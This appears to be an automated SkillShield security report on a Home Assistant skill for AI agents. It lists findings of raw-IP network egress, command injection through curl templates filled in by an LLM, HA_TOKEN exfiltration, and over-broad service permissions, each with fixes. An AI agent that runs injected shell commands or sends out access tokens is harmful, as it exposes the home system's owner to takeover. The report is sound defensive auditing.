Trust Assessment
homeassistant received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include Network egress to untrusted endpoints, Command Injection via unsanitized user input in shell commands, Data Exfiltration risk of HA_TOKEN due to command injection.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/dbhurley/homeassistant/SKILL.md:9 | |
| CRITICAL | Command Injection via unsanitized user input in shell commands The skill documentation provides `curl` command templates that include placeholders like `{domain}`, `{service}`, `{entity_id}`, and JSON payload content. If an LLM directly interpolates user-provided input into these placeholders without robust sanitization or escaping, an attacker could inject arbitrary shell commands. This could lead to remote code execution on the host system, data exfiltration (e.g., `HA_TOKEN`, environment variables, file system contents), or unauthorized actions within the Home Assistant instance. Implement strict input validation and sanitization for all user-provided parameters before constructing and executing shell commands. Prefer using a dedicated HTTP client library in a language like Python or Node.js, which handles URL encoding and JSON serialization safely, instead of direct shell execution of `curl` with interpolated strings. If shell execution is unavoidable, ensure all user-controlled variables are properly escaped (e.g., using `shlex.quote` in Python) and that the command is executed with the least possible privileges. | LLM | SKILL.md:50 | |
| HIGH | Data Exfiltration risk of HA_TOKEN due to command injection The skill uses the `HA_TOKEN` environment variable, a long-lived access token for Home Assistant, in its `curl` commands. If a command injection vulnerability (SS-LLM-003) is exploited, an attacker could craft a malicious payload to exfiltrate this `HA_TOKEN` to an external server. This token grants broad access to the Home Assistant instance, making its exfiltration a significant security risk. The primary remediation is to prevent command injection (SS-LLM-003). Additionally, consider implementing a mechanism to revoke or rotate `HA_TOKEN`s regularly. If possible, use tokens with the principle of least privilege, granting only the necessary permissions for the skill's intended functions. | LLM | SKILL.md:30 | |
| HIGH | Excessive permissions implied by 'Call any service' functionality The skill's documentation, particularly the 'Call any service' example, suggests that the `HA_TOKEN` used by the skill may have broad permissions, allowing it to invoke any Home Assistant service (`{domain}/{service}`). If the `HA_TOKEN` is configured with administrative or overly permissive access, an attacker exploiting a command injection vulnerability (SS-LLM-003) or even a legitimate user could perform unauthorized or destructive actions within the Home Assistant environment, far beyond the skill's intended scope. The skill does not specify minimum required permissions, implying a full-access token might be used. Implement the principle of least privilege for the `HA_TOKEN`. Create a dedicated Home Assistant user and a long-lived access token with only the specific permissions required for the skill's intended operations (e.g., `switch.turn_on`, `light.turn_on`, `scene.turn_on`). Avoid using tokens with broad administrative access. | LLM | SKILL.md:50 |
Scan History
Embed Code
[](https://skillshield.io/report/0d3ff80367d536a7)
Powered by SkillShield